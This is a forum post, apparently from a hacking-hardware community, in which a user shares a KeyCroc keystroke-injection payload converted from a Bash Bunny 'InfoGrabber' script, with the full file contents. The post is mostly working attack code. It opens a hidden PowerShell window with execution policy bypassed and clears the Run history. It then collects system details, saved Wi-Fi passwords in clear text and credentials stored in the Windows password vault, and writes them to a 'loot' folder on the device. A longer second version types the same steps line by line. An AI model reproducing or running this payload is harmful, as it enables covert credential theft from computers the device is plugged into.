Jump to content
Sign in to follow this  
spywill

Bashbunny payload into KeyCroc payload

Recommended Posts

Posted (edited)

this is a bash bunny payload  from https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/recon/InfoGrabber convert to a keycroc payload

the payload is working on the keycroc

just need to place all three files into the payloads folder on the keycroc and then type pcinfo and all the loot will be saved to the loot/info folder on the keycroc

 

 

 

info.ps1 payload.txt run.ps1

 

payload.txt 

MATCH pcinfo
QUACK LOCK
# --> udisk unmount
ATTACKMODE HID STORAGE
QUACK DELAY 5000
QUACK GUI d
QUACK GUI r
QUACK DELAY 500
QUACK STRING "powershell -nop -ex Bypass -w Hidden"
QUACK ENTER 
QUACK DELAY 1000
QUACK STRING ".((gwmi win32_volume -f 'label=''KeyCroc''').Name+'payloads\run.ps1')"
QUACK ENTER

run.ps1

#Remove run history
powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"

#Get the path and file name that you are using for output
# find connected KeyCroc drive:
$VolumeName = "KeyCroc"
$computerSystem = Get-CimInstance CIM_ComputerSystem
$backupDrive = $null
Get-WmiObject win32_logicaldisk | % {
    if ($_.VolumeName -eq $VolumeName) {
        $backupDrive = $_.DeviceID
    }
}

#See if a loot folder exist in usb. If not create one
$TARGETDIR = $backupDrive + "\loot"
if(!(Test-Path -Path $TARGETDIR )){
    New-Item -ItemType directory -Path $TARGETDIR
}

#See if a info folder exist in loot folder. If not create one
$TARGETDIR = $backupDrive + "\loot\info"
if(!(Test-Path -Path $TARGETDIR )){
    New-Item -ItemType directory -Path $TARGETDIR
}

#Create a path that will be used to make the file
$datetime = get-date -f yyyy-MM-dd_HH-mm
$backupPath = $backupDrive + "\loot\info\" + $computerSystem.Name + " - " + $datetime + ".txt"

#Create output from info script
$TARGETDIR = $MyInvocation.MyCommand.Path
$TARGETDIR = $TARGETDIR -replace ".......$"
cd $TARGETDIR
PowerShell.exe -ExecutionPolicy Bypass -File info.ps1 > $backupPath

 

info.ps1

# Shows details of currently running PC
# Simen Kjeserud (Original creator), Gachnang, DannyK999 (Version 2.0)

#Get info about pc

# Get IP / Nework Info
try
{
$computerPubIP = (Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content
}
catch
{
$computerPubIP = "Error getting Public IP"
}
$computerIP = Get-WmiObject Win32_NetworkAdapterConfiguration|Where {$_.Ipaddress.length -gt 1}
$IsDHCPEnabled = $False
$Networks =  Get-WmiObject Win32_NetworkAdapterConfiguration -Filter "DHCPEnabled=$True" | ? {$_.IPEnabled}
foreach ($Network in $Networks) {
If($network.DHCPEnabled) {
$IsDHCPEnabled = $True
  }
[string[]]$computerMAC = $Network.MACAddress
}

#Get System Info
$computerSystem = Get-CimInstance CIM_ComputerSystem
$computerBIOS = Get-CimInstance CIM_BIOSElement

$computerOs = Get-WmiObject win32_operatingsystem | select Caption, CSName, Version, @{Name="InstallDate";Expression={([WMI]'').ConvertToDateTime($_.InstallDate)}} , @{Name="LastBootUpTime";Expression={([WMI]'').ConvertToDateTime($_.LastBootUpTime)}}, @{Name="LocalDateTime";Expression={([WMI]'').ConvertToDateTime($_.LocalDateTime)}}, CurrentTimeZone, CountryCode, OSLanguage, SerialNumber, WindowsDirectory  | Format-List
$computerCpu = Get-WmiObject Win32_Processor | select DeviceID, Name, Caption, Manufacturer, MaxClockSpeed, L2CacheSize, L2CacheSpeed, L3CacheSize, L3CacheSpeed | Format-List
$computerMainboard = Get-WmiObject Win32_BaseBoard | Format-List

$computerRamCapacity = Get-WmiObject Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | % { "{0:N1} GB" -f ($_.sum / 1GB)}
$computerRam = Get-WmiObject Win32_PhysicalMemory | select DeviceLocator, @{Name="Capacity";Expression={ "{0:N1} GB" -f ($_.Capacity / 1GB)}}, ConfiguredClockSpeed, ConfiguredVoltage | Format-Table

# Get HDDs
$driveType = @{
   2="Removable disk "
   3="Fixed local disk "
   4="Network disk "
   5="Compact disk "}
$Hdds = Get-WmiObject Win32_LogicalDisk | select DeviceID, VolumeName, @{Name="DriveType";Expression={$driveType.item([int]$_.DriveType)}}, FileSystem,VolumeSerialNumber,@{Name="Size_GB";Expression={"{0:N1} GB" -f ($_.Size / 1Gb)}}, @{Name="FreeSpace_GB";Expression={"{0:N1} GB" -f ($_.FreeSpace / 1Gb)}}, @{Name="FreeSpace_percent";Expression={"{0:N1}%" -f ((100 / ($_.Size / $_.FreeSpace)))}} | Format-Table DeviceID, VolumeName,DriveType,FileSystem,VolumeSerialNumber,@{ Name="Size GB"; Expression={$_.Size_GB}; align="right"; }, @{ Name="FreeSpace GB"; Expression={$_.FreeSpace_GB}; align="right"; }, @{ Name="FreeSpace %"; Expression={$_.FreeSpace_percent}; align="right"; }

#Get - Com & Serial Devices
$COMDevices = Get-Wmiobject Win32_USBControllerDevice | ForEach-Object{[Wmi]($_.Dependent)} | Select-Object Name, DeviceID, Manufacturer | Sort-Object -Descending Name | Format-Table

# Check RDP
$RDP
if ((Get-ItemProperty "hklm:\System\CurrentControlSet\Control\Terminal Server").fDenyTSConnections -eq 0) { 
    $RDP = "RDP is Enabled" 
} else {
    $RDP = "RDP is NOT Enabled" 
}

# Get Network Interfaces
$Network = Get-WmiObject Win32_NetworkAdapterConfiguration | where { $_.MACAddress -notlike $null }  | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress 

# Get wifi SSIDs and Passwords    
$WLANProfileNames = @()
#Get all the WLAN profile names
$Output = netsh.exe wlan show profiles | Select-String -pattern ":"
#Trim the output to receive only the name
Foreach($WLANProfileName in $Output){
    $WLANProfileNames += (($WLANProfileName -split ":")[1]).Trim()
}
$WLANProfileObjects = @()
#Bind the WLAN profile names and also the password to a custom object
Foreach($WLANProfileName in $WLANProfileNames){
    #get the output for the specified profile name and trim the output to receive the password if there is no password it will inform the user
    try{
        $WLANProfilePassword = (((netsh.exe wlan show profiles name="$WLANProfileName" key=clear | select-string -Pattern "Key Content") -split ":")[1]).Trim()
    } Catch {
        $WLANProfilePassword = "The password is not stored in this profile"
    }
    #Build the object and add this to an array
    $WLANProfileObject = New-Object PSCustomobject 
    $WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfileName" -Value $WLANProfileName
    $WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfilePassword" -Value $WLANProfilePassword
    $WLANProfileObjects += $WLANProfileObject
    Remove-Variable WLANProfileObject
}

# local-user
$luser = Get-WmiObject -Class Win32_UserAccount | Format-Table Caption, Domain, Name, FullName, SID

# process first
$process = Get-WmiObject win32_process | select Handle, ProcessName, ExecutablePath, CommandLine

# Get Listeners / ActiveTcpConnections
$listener = Get-NetTCPConnection | select @{Name="LocalAddress";Expression={$_.LocalAddress + ":" + $_.LocalPort}}, @{Name="RemoteAddress";Expression={$_.RemoteAddress + ":" + $_.RemotePort}}, State, AppliedSetting, OwningProcess
$listener = $listener | foreach-object {
    $listenerItem = $_
    $processItem = ($process | where { [int]$_.Handle -like [int]$listenerItem.OwningProcess })
    new-object PSObject -property @{
      "LocalAddress" = $listenerItem.LocalAddress
      "RemoteAddress" = $listenerItem.RemoteAddress
      "State" = $listenerItem.State
      "AppliedSetting" = $listenerItem.AppliedSetting
      "OwningProcess" = $listenerItem.OwningProcess
      "ProcessName" = $processItem.ProcessName
    }
} | select LocalAddress, RemoteAddress, State, AppliedSetting, OwningProcess, ProcessName | Sort-Object LocalAddress | Format-Table 

# process last
$process = $process | Sort-Object ProcessName | Format-Table Handle, ProcessName, ExecutablePath, CommandLine

# service
$service = Get-WmiObject win32_service | select State, Name, DisplayName, PathName, @{Name="Sort";Expression={$_.State + $_.Name}} | Sort-Object Sort | Format-Table State, Name, DisplayName, PathName

# installed software (get uninstaller)
$software = Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | where { $_.DisplayName -notlike $null } |  Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Sort-Object DisplayName | Format-Table -AutoSize

# drivers
$drivers = Get-WmiObject Win32_PnPSignedDriver| where { $_.DeviceName -notlike $null } | select DeviceName, FriendlyName, DriverProviderName, DriverVersion

# videocard
$videocard = Get-WmiObject Win32_VideoController | Format-Table Name, VideoProcessor, DriverVersion, CurrentHorizontalResolution, CurrentVerticalResolution

#Get stored passwords
[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
$vault = New-Object Windows.Security.Credentials.PasswordVault 
$vault = $vault.RetrieveAll() | % { $_.RetrievePassword();$_ }

#The output
Clear-Host
Write-Host 

$computerSystem.Name
"=================================================================="
"Manufacturer: " + $computerSystem.Manufacturer
"Model: " + $computerSystem.Model
"Serial Number: " + $computerBIOS.SerialNumber
""
""
""

"OS:"
"=================================================================="+ ($computerOs | out-string)

"CPU:"
"=================================================================="+ ($computerCpu | out-string)

"RAM:"
"=================================================================="
"Capacity: " + $computerRamCapacity+ ($computerRam | out-string)

"Mainboard:"
"=================================================================="+ ($computerMainboard | out-string)

"Bios:"
"=================================================================="+ (Get-WmiObject win32_bios | out-string)


"Local-user:"
"=================================================================="+ ($luser | out-string)

"HDDs:"
"=================================================================="+ ($Hdds | out-string)

"COM & SERIAL DEVICES:"
"=================================================================="+ ($COMDevices | Out-String)

"Network:"
"=================================================================="
"Computers MAC address: " + $computerMAC
"Computers IP address: " + $computerIP.ipaddress[0]
"Public IP address: " + $computerPubIP  
"RDP: " + $RDP
""
($Network | out-string)

"W-Lan profiles:"
"=================================================================="+ ($WLANProfileObjects | out-string)

"listeners / ActiveTcpConnections:"
"=================================================================="+ ($listener | out-string)

"Current running process:"
"=================================================================="+ ($process | out-string)

"Services:"
"=================================================================="+ ($service | out-string)

"Installed software:"
"=================================================================="+ ($software | out-string)

"Installed drivers:"
"=================================================================="+ ($drivers | out-string)

"Installed videocards:"
"=================================================================="+ ($videocard | out-string)

"Windows/user passwords:"
"=================================================================="
$vault | select Resource, UserName, Password | Sort-Object Resource | ft -AutoSize

Remove-Variable -Name computerPubIP,
computerIP,IsDHCPEnabled,Network,Networks, 
computerMAC,computerSystem,computerBIOS,computerOs,
computerCpu, computerMainboard,computerRamCapacity,
computerRam,driveType,Hdds,RDP,WLANProfileNames,WLANProfileName,
Output,WLANProfileObjects,WLANProfilePassword,WLANProfileObject,luser,
process,listener,listenerItem,process,service,software,drivers,videocard,
vault -ErrorAction SilentlyContinue -Force

 

this was my first attempt does not save to loot folder

 

MATCH pcinfo
# --> udisk unmount
ATTACKMODE HID STORAGE
QUACK DELAY 5000
QUACK GUI d
QUACK GUI r
QUACK DELAY 1000
QUACK STRING powershell
QUACK ENTER 
QUACK DELAY 1000
# --> Remove run history
QUACK STRING "\"Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue\""
QUACK ENTER
QUACK DELAY 1000
# --> Get the path and file name that you are using for output
# --> find connected KeyCroc drive:
QUACK STRING "\$VolumeName = \"KeyCroc\""
QUACK ENTER
QUACK STRING "\$computerSystem = Get-CimInstance CIM_ComputerSystem"
QUACK ENTER
QUACK DELAY 1000
QUACK STRING "\$backupDrive = \$null"
QUACK ENTER
QUACK STRING "get-wmiobject win32_logicaldisk | % {"
QUACK ENTER
QUACK STRING "if (\$_.VolumeName -eq \$VolumeName) {"
QUACK ENTER
QUACK STRING "\$backupDrive = \$_.DeviceID"
QUACK ENTER
QUACK STRING "}"
QUACK ENTER
QUACK STRING "}"
QUACK ENTER
# --> See if a loot folder exist in keycroc. If not create one
QUACK STRING "\$TARGETDIR = \$backupDrive + \"\loot\""
QUACK ENTER
QUACK STRING "if(!(Test-Path -Path \$TARGETDIR )){"
QUACK ENTER
QUACK STRING "New-Item -ItemType directory -Path \$TARGETDIR"
QUACK ENTER
QUACK STRING "}"
QUACK ENTER
QUACK DELAY 1000
# --> See if a info folder exist in loot folder. If not create one
QUACK STRING "\$TARGETDIR = \$backupDrive + \"\loot\info\""
QUACK ENTER
QUACK STRING "if(!(Test-Path -Path \$TARGETDIR )){"
QUACK ENTER
QUACK STRING "New-Item -ItemType directory -Path \$TARGETDIR"
QUACK ENTER
QUACK STRING "}"
QUACK ENTER
QUACK DELAY 1000
# --> Create a path that will be used to make the file
QUACK STRING "\$datetime = get-date -f yyyy-MM-dd_HH-mm"
QUACK ENTER
QUACK STRING "\$backupPath = \$backupDrive + \"\loot\info\" + \$computerSystem.Name + \" - \" + \$datetime + \".txt\""
QUACK ENTER
QUACK DELAY 1000
# --> Create output from info script
QUACK STRING "\$TARGETDIR = \$MyInvocation.MyCommand.Path"
QUACK ENTER
QUACK DELAY 1000
QUACK STRING "\$TARGETDIR = \$TARGETDIR -replace \".......\$\""
QUACK ENTER
QUACK DELAY 1000
QUACK STRING "cd \$TARGETDIR"
QUACK ENTER
#QUACK STRING "PowerShell.exe -ExecutionPolicy Bypass -File info.ps1 > \$backupPath"
QUACK ENTER
QUACK DELAY 1000
# --> Shows details of currently running PC
# --> Get info about pc
# --> Get IP / Nework Info
QUACK DELAY 1000
QUACK STRING "try"
QUACK ENTER
QUACK STRING "{"
QUACK ENTER
QUACK STRING "\$computerPubIP = (Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content"
QUACK ENTER
QUACK STRING "}"
QUACK ENTER
QUACK STRING "catch"
QUACK ENTER
QUACK STRING "{"
QUACK ENTER
QUACK STRING "\$computerPubIP = \"Error getting Public IP\""
QUACK ENTER
QUACK STRING "}"
QUACK ENTER
QUACK STRING "\$computerIP = Get-WmiObject Win32_NetworkAdapterConfiguration|Where {\$_.Ipaddress.length -gt 1}"
QUACK ENTER
QUACK STRING "\$IsDHCPEnabled = \$False"
QUACK ENTER
QUACK STRING "\$Networks = Get-WmiObject Win32_NetworkAdapterConfiguration -Filter \"DHCPEnabled=\$True\" | ? {\$_.IPEnabled}"
QUACK ENTER
QUACK STRING "foreach (\$Network in \$Networks) {"
QUACK ENTER
QUACK STRING "If(\$network.DHCPEnabled) {"
QUACK ENTER
QUACK STRING "\$IsDHCPEnabled = \$True"
QUACK ENTER
QUACK STRING "}"
QUACK ENTER
QUACK STRING "[string[]]\$computerMAC = \$Network.MACAddress"
QUACK ENTER
QUACK STRING "}"
QUACK ENTER
# --> Get System Info
QUACK DELAY 1000
QUACK STRING "\$computerSystem = Get-CimInstance CIM_ComputerSystem"
QUACK ENTER
QUACK STRING "\$computerBIOS = Get-CimInstance CIM_BIOSElement"
QUACK ENTER
QUACK STRING "\$computerOs = Get-WmiObject win32_operatingsystem | select Caption, CSName, Version, @{Name=\"InstallDate\";Expression={([WMI]'').ConvertToDateTime(\$_.InstallDate)}} , @{Name=\"LastBootUpTime\";Expression={([WMI]'').ConvertToDateTime(\$_.LastBootUpTime)}}, @{Name=\"LocalDateTime\";Expression={([WMI]'').ConvertToDateTime(\$_.LocalDateTime)}}, CurrentTimeZone, CountryCode, OSLanguage, SerialNumber, WindowsDirectory  | Format-List"
QUACK ENTER
QUACK STRING "\$computerCpu = Get-WmiObject Win32_Processor | select DeviceID, Name, Caption, Manufacturer, MaxClockSpeed, L2CacheSize, L2CacheSpeed, L3CacheSize, L3CacheSpeed | Format-List"
QUACK ENTER
QUACK STRING "\$computerMainboard = Get-WmiObject Win32_BaseBoard | Format-List"
QUACK ENTER
QUACK STRING "\$computerRamCapacity = Get-WmiObject Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | % { \"{0:N1} GB\" -f (\$_.sum / 1GB)}"
QUACK ENTER
QUACK STRING "\$computerRam = Get-WmiObject Win32_PhysicalMemory | select DeviceLocator, @{Name=\"Capacity\";Expression={ \"{0:N1} GB\" -f (\$_.Capacity / 1GB)}}, ConfiguredClockSpeed, ConfiguredVoltage | Format-Table"
QUACK ENTER
# --> Get HDDs
QUACK DELAY 1000
QUACK STRING "\$driveType = @{"
QUACK ENTER
QUACK STRING "2=\"Removable disk\""
QUACK ENTER
QUACK STRING "3=\"Fixed local disk\""
QUACK ENTER
QUACK STRING "4=\"Network disk\""
QUACK ENTER
QUACK STRING "5=\"Compact disk\"}"
QUACK ENTER
QUACK STRING "\$Hdds = Get-WmiObject Win32_LogicalDisk | select DeviceID, VolumeName, @{Name=\"DriveType\";Expression={\$driveType.item([int]\$_.DriveType)}}, FileSystem,VolumeSerialNumber,@{Name=\"Size_GB\";Expression={\"{0:N1} GB\" -f (\$_.Size / 1Gb)}}, @{Name=\"FreeSpace_GB\";Expression={\"{0:N1} GB\" -f (\$_.FreeSpace / 1Gb)}}, @{Name=\"FreeSpace_percent\";Expression={\"{0:N1}%\" -f ((100 / (\$_.Size / \$_.FreeSpace)))}} | Format-Table DeviceID, VolumeName,DriveType,FileSystem,VolumeSerialNumber, @{ Name=\"Size GB\"; Expression={\$_.Size_GB}; align=\"right\"; }, @{ Name=\"FreeSpace GB\"; Expression={\$_.FreeSpace_GB}; align=\"right\"; }, @{ Name=\"FreeSpace %\"; Expression={\$_.FreeSpace_percent}; align=\"right\"; }"
QUACK ENTER
# --> Get - Com & Serial Devices
QUACK DELAY 1000
QUACK STRING "\$COMDevices = Get-Wmiobject Win32_USBControllerDevice | ForEach-Object{[Wmi](\$_.Dependent)} | Select-Object Name, DeviceID, Manufacturer | Sort-Object -Descending Name | Format-Table"
QUACK ENTER
# --> Check RDP
QUACK STRING "\$RDP"
QUACK DELAY 1000
QUACK ENTER
QUACK STRING "if ((Get-ItemProperty \"hklm:\System\CurrentControlSet\Control\Terminal Server\").fDenyTSConnections -eq 0) {"
QUACK ENTER
QUACK STRING "\$RDP = \"RDP is Enabled\""
QUACK ENTER 
QUACK STRING "} else {"
QUACK ENTER
QUACK STRING "\$RDP = \"RDP is NOT Enabled\""
QUACK ENTER 
QUACK STRING "}"
QUACK ENTER
# --> Get Network Interfaces
QUACK DELAY 1000
QUACK STRING "\$Network = Get-WmiObject Win32_NetworkAdapterConfiguration | where { \$_.MACAddress -notlike \$null }  | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress" 
QUACK ENTER
# --> Get wifi SSIDs and Passwords
QUACK DELAY 1000    
QUACK STRING "\$WLANProfileNames = @()"
QUACK ENTER
# --> Get all the WLAN profile names
QUACK DELAY 1000
QUACK STRING "\$Output = netsh.exe wlan show profiles | Select-String -pattern \":\""
QUACK ENTER
# --> Trim the output to receive only the name
QUACK DELAY 1000
QUACK STRING "Foreach(\$WLANProfileName in \$Output){"
QUACK ENTER
QUACK STRING "\$WLANProfileNames += ((\$WLANProfileName -split \":\")[1]).Trim()"
QUACK ENTER
QUACK STRING "}"
QUACK ENTER
QUACK STRING "\$WLANProfileObjects = @()"
QUACK ENTER
# -->  Bind the WLAN profile names and also the password to a custom object
QUACK DELAY 1000
QUACK STRING "Foreach(\$WLANProfileName in \$WLANProfileNames){"
QUACK ENTER
# --> get the output for the specified profile name and trim the output to receive the password if there is no password it will inform the user
QUACK DELAY 1000
QUACK STRING "try"
QUACK ENTER
QUACK STRING "{"
QUACK ENTER
QUACK STRING "\$WLANProfilePassword = (((netsh.exe wlan show profiles name=\"\$WLANProfileName\" key=clear | select-string -Pattern \"Key Content\") -split \":\")[1]).Trim()"
QUACK ENTER
QUACK STRING "}" 
QUACK ENTER
QUACK STRING "Catch"
QUACK ENTER
QUACK STRING "{"
QUACK ENTER
QUACK STRING "\$WLANProfilePassword = \"The password is not stored in this profile\""
QUACK ENTER
QUACK STRING "}"
QUACK ENTER
QUACK DELAY 2000
# --> Build the object and add this to an array
QUACK STRING "\$WLANProfileObject = New-Object PSCustomobject"
QUACK ENTER 
QUACK STRING "\$WLANProfileObject | Add-Member -Type NoteProperty -Name \"ProfileName\" -Value \$WLANProfileName"
QUACK ENTER
QUACK STRING "\$WLANProfileObject | Add-Member -Type NoteProperty -Name \"ProfilePassword\" -Value \$WLANProfilePassword"
QUACK ENTER
QUACK STRING "\$WLANProfileObjects += \$WLANProfileObject"
QUACK ENTER
QUACK STRING "Remove-Variable WLANProfileObject"
QUACK ENTER
QUACK STRING "}"
QUACK ENTER
# --> local-user
QUACK DELAY 1000
QUACK STRING "\$luser = Get-WmiObject -Class Win32_UserAccount | Format-Table Caption, Domain, Name, FullName, SID"
QUACK ENTER
# --> process first
QUACK DELAY 1000
QUACK STRING "\$process = Get-WmiObject win32_process | select Handle, ProcessName, ExecutablePath, CommandLine"
QUACK ENTER
# --> Get Listeners / ActiveTcpConnections
QUACK DELAY 1000
QUACK STRING "\$listener = Get-NetTCPConnection | select @{Name=\"LocalAddress\";Expression={\$_.LocalAddress + \":\" + \$_.LocalPort}}, @{Name=\"RemoteAddress\";Expression={\$_.RemoteAddress + \":\" + \$_.RemotePort}}, State, AppliedSetting, OwningProcess"
QUACK ENTER
QUACK STRING "\$listener = \$listener | foreach-object {"
QUACK ENTER
QUACK STRING "\$listenerItem = \$_"
QUACK ENTER
QUACK STRING "\$processItem = (\$process | where { [int]\$_.Handle -like [int]\$listenerItem.OwningProcess })"
QUACK ENTER
QUACK STRING "new-object PSObject -property @{"
QUACK ENTER
QUACK STRING "\"LocalAddress\" = \$listenerItem.LocalAddress"
QUACK ENTER
QUACK STRING "\"RemoteAddress\" = \$listenerItem.RemoteAddress"
QUACK ENTER
QUACK STRING "\"State\" = \$listenerItem.State"
QUACK ENTER
QUACK STRING "\"AppliedSetting\" = \$listenerItem.AppliedSetting"
QUACK ENTER
QUACK STRING "\"OwningProcess\" = \$listenerItem.OwningProcess"
QUACK ENTER
QUACK STRING "\"ProcessName\" = \$processItem.ProcessName"
QUACK ENTER
QUACK STRING "}"
QUACK ENTER
QUACK STRING "} | select LocalAddress, RemoteAddress, State, AppliedSetting, OwningProcess, ProcessName | Sort-Object LocalAddress | Format-Table" 
QUACK ENTER
# --> process last
QUACK DELAY 1000
QUACK STRING "\$process = \$process | Sort-Object ProcessName | Format-Table Handle, ProcessName, ExecutablePath, CommandLine"
QUACK ENTER
# --> service
QUACK DELAY 1000
QUACK STRING "\$service = Get-WmiObject win32_service | select State, Name, DisplayName, PathName, @{Name=\"Sort\";Expression={\$_.State + \$_.Name}} | Sort-Object Sort | Format-Table State, Name, DisplayName, PathName"
QUACK ENTER
# --> installed software (get uninstaller)
QUACK DELAY 1000
QUACK STRING "\$software = Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | where { \$_.DisplayName -notlike \$null } |  Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Sort-Object DisplayName | Format-Table -AutoSize"
QUACK ENTER
# --> drivers
QUACK DELAY 1000
QUACK STRING "\$drivers = Get-WmiObject Win32_PnPSignedDriver | where { \$_.DeviceName -notlike \$null } | select DeviceName, FriendlyName, DriverProviderName, DriverVersion"
QUACK ENTER
# --> videocard
QUACK DELAY 1000
QUACK STRING "\$videocard = Get-WmiObject Win32_VideoController | Format-Table Name, VideoProcessor, DriverVersion, CurrentHorizontalResolution, CurrentVerticalResolution"
QUACK ENTER
# --> Get stored passwords
QUACK DELAY 1000
QUACK STRING "[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]"
QUACK ENTER
QUACK STRING "\$vault = New-Object Windows.Security.Credentials.PasswordVault" 
QUACK ENTER
QUACK STRING "\$vault = \$vault.RetrieveAll() | % { \$_.RetrievePassword();\$_ }"
QUACK ENTER
# --> The output
QUACK DELAY 2000
QUACK STRING "Clear-Host"
QUACK ENTER
QUACK STRING "Write-Host"
QUACK ENTER 
QUACK DELAY 2000
QUACK STRING "\$computerSystem.Name"
QUACK ENTER
QUACK STRING "\"==================================================================\""
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"Manufacturer: \" + \$computerSystem.Manufacturer"
QUACK ENTER
QUACK STRING "\"Model: \" + \$computerSystem.Model"
QUACK ENTER
QUACK STRING "\"Serial Number: \" + \$computerBIOS.SerialNumber"
QUACK ENTER
QUACK STRING "\"\""
QUACK ENTER
QUACK STRING "\"\""
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"\""
QUACK ENTER
QUACK STRING "\"OS:\""
QUACK ENTER
QUACK STRING "\"==================================================================\"+ (\$computerOs | out-string)"
QUACK ENTER
QUACK DELAY 2000
QUACK ENTER
QUACK STRING "\"CPU:\""
QUACK ENTER
QUACK STRING "\"==================================================================\"+ (\$computerCpu | out-string)"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"RAM:\""
QUACK ENTER
QUACK STRING "\"==================================================================\""
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"Capacity: \" + \$computerRamCapacity+ (\$computerRam | out-string)"
QUACK ENTER
QUACK STRING "\"Mainboard:\""
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"==================================================================\"+ (\$computerMainboard | out-string)"
QUACK ENTER
QUACK STRING "\"Bios:\""
QUACK ENTER
QUACK STRING "\"==================================================================\"+ (Get-WmiObject win32_bios | out-string)"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"Local-user:\""
QUACK ENTER
QUACK STRING "\"==================================================================\"+ (\$luser | out-string)"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"HDDs:\""
QUACK ENTER
QUACK STRING "\"==================================================================\"+ (\$Hdds | out-string)"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"COM & SERIAL DEVICES:\""
QUACK ENTER
QUACK STRING "\"==================================================================\"+ (\$COMDevices | Out-String)"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"Network:\""
QUACK ENTER
QUACK STRING "\"==================================================================\""
QUACK ENTER
QUACK STRING "\"Computers MAC address: \" + \$computerMAC"
QUACK ENTER
QUACK STRING "\"Computers IP address: \" + \$computerIP.ipaddress[0]"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"Public IP address: \" + \$computerPubIP"
QUACK ENTER
QUACK DELAY 2000  
QUACK STRING "\"RDP: \" + \$RDP"
QUACK ENTER
QUACK STRING "\"\""
QUACK ENTER
QUACK STRING "(\$Network | out-string)"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"W-Lan profiles:\""
QUACK ENTER
QUACK STRING "\"==================================================================\"+ (\$WLANProfileObjects | out-string)"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"listeners / ActiveTcpConnections:\""
QUACK ENTER
QUACK STRING "\"==================================================================\"+ (\$listener | out-string)"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"Current running process:\""
QUACK ENTER
QUACK STRING "\"==================================================================\"+ (\$process | out-string)"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"Services:\""
QUACK ENTER
QUACK STRING "\"==================================================================\"+ (\$service | out-string)"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"Installed software:\""
QUACK ENTER
QUACK STRING "\"==================================================================\"+ (\$software | out-string)"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"Installed drivers:\""
QUACK ENTER
QUACK STRING "\"==================================================================\"+ (\$drivers | out-string)"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"Installed videocards:\""
QUACK ENTER
QUACK STRING "\"==================================================================\"+ (\$videocard | out-string)"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"Windows/user passwords:\""
QUACK ENTER
QUACK STRING "\"==================================================================\""
QUACK ENTER
QUACK STRING "\$vault | select Resource, UserName, Password | Sort-Object Resource | ft -AutoSize"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "Remove-Variable -Name computerPubIP,"
QUACK ENTER
QUACK STRING "computerIP,IsDHCPEnabled,Network,Networks,"
QUACK ENTER 
QUACK STRING "computerMAC,computerSystem,computerBIOS,computerOs,"
QUACK ENTER
QUACK STRING "computerCpu, computerMainboard,computerRamCapacity,"
QUACK ENTER
QUACK STRING "computerRam,driveType,Hdds,RDP,WLANProfileNames,WLANProfileName,"
QUACK ENTER
QUACK STRING "Output,WLANProfileObjects,WLANProfilePassword,WLANProfileObject,luser,"
QUACK ENTER
QUACK STRING "process,listener,listenerItem,process,service,software,drivers,videocard,"
QUACK ENTER
QUACK STRING "vault -ErrorAction SilentlyContinue -Force"
QUACK ENTER
#ATTACKMODE HID
QUACK DELAY 5000

 

Edited by spywill

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...
Sign in to follow this  

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...